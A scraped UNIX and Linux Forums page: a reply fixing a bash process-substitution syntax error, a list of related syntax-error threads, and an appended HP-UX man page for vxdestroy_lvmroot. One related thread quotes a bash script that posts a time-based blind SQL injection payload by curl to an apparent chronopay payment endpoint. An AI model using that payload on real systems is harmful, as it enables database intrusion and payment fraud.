Sponsored Content
Contact Us Post Here to Contact Site Administrators and Moderators How to Post in the The UNIX and Linux Forums Syntax error near unexpected token `(' Post 302997185 by RavinderSingh13 on Tuesday 9th of May 2017 08:10:04 AM
Old 05-09-2017
Hello ranabhavish,

Not sure what you are trying to do here but from error vice could you please try following commands(removing the space between < and ().
Code:
join -v 2 <(sort a.txt) <(sort b.txt)

Thanks,
R. Singh

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

What do I do here? #!/bin/bash payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)# hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'` curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
Discussion started by: iiiiiiiiiii
2 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

8. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies
vxdestroy_lvmroot(1M)													     vxdestroy_lvmroot(1M)

NAME
vxdestroy_lvmroot - remove LVM root disk and associated LVM volume group SYNOPSIS
vxdestroy_lvmroot [-v] [-b] lvm_root_disk DESCRIPTION
The vxdestroy_lvmroot command tears down and removes the LVM volume group associated with the specified physical disk. This is done by removing the volumes in the volume group and then removing the volume group. OPTIONS
-b Invokes the setboot command to change the primary boot disk to the VxVM root disk from which the system was booted (if the pri- mary boot disk is not already set to this disk). The alternate boot device remains unchanged. If the -v option is also speci- fied, the settings of the primary and alternate boot devices are displayed. -v Outputs verbose messages including a timestamp that indicates major operations being performed. ARGUMENTS
lvm_root_disk Specifies the device name of the LVM root disk that is to be destroyed, along with its entire volume group. EXAMPLES
This example shows the vxdestroy_lvmroot command invoked in its simpliest form: /etc/vx/bin/vxdestroy_lvmroot c5t1d0 # /etc/vx/bin/vxdestroy_lvmroot -v -b c3t0d0 Are you sure about destroying c3t0d0 (imported on VG /dev/vg02) ? YES vxdestroy_lvmroot 06:02: Tearing down /dev/vg02 on device c3t0d0 vxdestroy_lvmroot 06:02: Unmounting and removing any volumes associated with /dev/vg02 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol1 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol2 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol3 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol4 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol5 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol6 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol7 vxdestroy_lvmroot 06:02: removing logical volume /dev/vg02/lvol8 vxdestroy_lvmroot 06:02: Removing Volume Group /dev/vg02 vxdestroy_lvmroot 06:02: Removing device files in /dev/vg02 vxdestroy_lvmroot 06:02: Removing LVM Physical Volume c3t0d0 vxdestroy_lvmroot 06:02: Removing LVM Physical Volume c1t1d3 vxdestroy_lvmroot 06:02: Removing LVM Physical Volume c1t1d4 vxdestroy_lvmroot 06:02: Removing LVM Physical Volume c1t1d5 vxdestroy_lvmroot 06:03: Current setboot values: vxdestroy_lvmroot 06:03: Primary: 0/0/6/0/0.0.0 vxdestroy_lvmroot 06:03: Alternate: 0/0/1/0/0.1.0 vxdestroy_lvmroot 06:03: Making disk c0t1d0 (0/0/1/0/0.1.0) the primary boot disk vxdestroy_lvmroot 06:03: Removal of device c3t0d0, volume group /dev/vg02 was successful SEE ALSO
cpio(1), dd(1), fsck(1M), setboot(1M) vxbootsetup(1M) vxcp_lvmroot(1M) vxres_lvmroot(1M) VxVM 5.0.31.1 24 Mar 2008 vxdestroy_lvmroot(1M)